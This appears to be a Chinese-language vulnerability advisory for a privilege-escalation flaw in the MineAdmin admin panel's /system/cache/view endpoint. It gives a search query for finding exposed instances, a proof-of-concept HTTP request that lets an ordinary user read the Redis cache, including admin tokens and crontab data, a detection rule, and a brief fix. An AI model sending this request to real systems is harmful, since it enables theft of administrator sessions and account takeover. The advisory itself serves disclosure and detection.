跳转至

MineAdmin企业级后台管理系统view接口逻辑缺陷漏洞

MineAdmin官网:https://doc.mineadmin.com/

资产测绘语法:body="MineAdmin"

影响版本

MineAdmin v1.x MineAdmin v2.x

漏洞危害

/system/cache/view处存在逻辑缺陷漏洞(垂直越权),view接口虽需登录 ,但缺少具体的权限标识,可通过垂直越权直接骗过系统,越权访问 Redis 缓存。通过缓存信息可查看管理员及所有用户token、crontab等高危敏感信息。

漏洞复现

POC/EXP:普通用户垂直越权访问MineAdmin:Token:1(管理员token)

POST /prod/system/cache/view HTTP/1.1
Host: 127.0.0.1:8888
Accept-Language: zh_CN
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Authorization: Bearer (此处替换普通用户token)
Content-Type: application/json;charset=UTF-8
Content-Length: 27

image-20260108155328903

POC/EXP:普通用户垂直越权访问MineAdmin:crontab

image-20260108155257777

以下截图对应上面截图中的jwt token证明越权成功。

普通用户jwt token

image-20260108155404051

获取到的管理员用户jwt token

image-20260108155425749

sonrt规则:

alert http any any -> $HOME_NET any (
    msg:"MineAdmin - Logic Flaw Vulnerability via /prod/system/cache/view";
    flow:to_server,established;
    http.method; content:"POST";
    http.uri; content:"/prod/system/cache/view";
    http.header; content:"Authorization: Bearer";
    http.header; content:"Content-Type: application/json";
    metadata:
        service http,
        affected_product "MineAdmin企业级后台管理系统",
        vulnerability_type "Logic Flaw Vulnerability",
        severity "medium";
    classtype:policy-violation;
    sid:1000578;
    rev:1;
    priority:2;
)

漏洞修复

view接口处加强权限校验。